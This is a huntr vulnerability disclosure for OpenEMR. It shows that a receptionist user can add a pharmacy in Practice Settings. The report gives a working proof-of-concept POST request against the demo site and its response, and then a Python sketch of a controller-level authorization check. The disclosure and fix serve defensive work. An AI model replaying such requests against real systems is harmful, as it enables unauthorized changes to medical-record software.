Broken Access Controls in Practice Settings

huntr report AF73E913-730C-4245-88CE-26FC908D3644
Dec 26, 2022 - 09:07:33
nhienit2010
www.huntr.dev

Tags: broken access controls, receptionist users, pharmacy addition

EPSS: 0.004 (percentile 73.7%)

Description

We observed that a receptionist user can add a Pharmacy in the Practice Settings section, although this area should not be accessible to receptionist users.

Proof of Concept

REQUEST:

POST /openemr/controller.php?practice_settings&pharmacy&action=edit HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=<receptionist user's cookie>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/controller.php?practice_settings&pharmacy&action=edit

form_id=&name=test_pharmarcy&address_line1=11&address_line2=11&city=&state=&zip=&email=&phone=&fax=&npi=&ncpdp=&transmit_method=1&id=&process=true

RESPONSE:

HTTP/1.1 302 Found
Server: nginx/1.21.1
Date: Mon, 26 Dec 2022 09:02:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /openemr/controller.php?practice_settings&pharmacy&action=list
Content-Length: 9246

<!DOCTYPE html>
<html>
<head>
    <title>Practice Settings</title>

    
<meta charset="utf-8" />
...

PoC Images

[image]

After we send the request above,

[image]

a new pharmacy is added.

[image]
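The control that is missing here, modelled in Python as an added example (this is not OpenEMR's code): the practice_settings route has to be authorized at the controller entry point, not merely hidden from the receptionist's menu. The role names, the admin-only policy table and the assumption that the editor commits when process=true is posted are assumptions; the request itself is the one captured above.

```python
# Added illustration, not OpenEMR code: an authorization gate at the controller
# entry point, using the request captured in this report as the test input.
from urllib.parse import parse_qs, urlsplit

# Assumed policy: the practice_settings area is admin-only, reads and writes alike.
PRACTICE_SETTINGS_ROLES = {"admin"}

def parse_request(request_line, body=""):
    """Split 'METHOD /path?query HTTP/1.1' and a form body into routable parts."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    # keep_blank_values keeps bare flags such as 'practice_settings' and 'pharmacy'
    return {
        "method": method,
        "path": parts.path,
        "query": parse_qs(parts.query, keep_blank_values=True),
        "form": parse_qs(body, keep_blank_values=True),
    }

def is_practice_settings(req):
    return req["path"].endswith("/controller.php") and "practice_settings" in req["query"]

def is_write(req):
    """Assumed: the pharmacy editor commits only when the form carries process=true."""
    return req["method"] == "POST" and req["form"].get("process") == ["true"]

def menu_hidden(role):
    """UI-level hiding only; the report shows this alone does not stop the POST."""
    return role not in PRACTICE_SETTINGS_ROLES

def authorize(role, req):
    """Controller-level decision, to run before any handler reaches the database."""
    if not is_practice_settings(req):
        return 200, "not a practice_settings route"
    if role not in PRACTICE_SETTINGS_ROLES:
        kind = "write" if is_write(req) else "read"
        action = req["query"].get("action", [""])[0]
        return 403, f"{role} denied practice_settings {kind} (action={action})"
    return 200, "ok"

# Request from the report (cookie and unused headers omitted)
REQUEST_LINE = "POST /openemr/controller.php?practice_settings&pharmacy&action=edit HTTP/1.1"
REQUEST_BODY = ("form_id=&name=test_pharmarcy&address_line1=11&address_line2=11&city=&state=&zip="
                "&email=&phone=&fax=&npi=&ncpdp=&transmit_method=1&id=&process=true")

if __name__ == "__main__":
    req = parse_request(REQUEST_LINE, REQUEST_BODY)
    for role in ("receptionist", "admin"):
        print(f"{role}: menu hidden={menu_hidden(role)}, controller={authorize(role, req)}")
```

Only the receptionist line should come back 403; the menu already being hidden for that role is the state the report starts from and changes nothing on its own.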
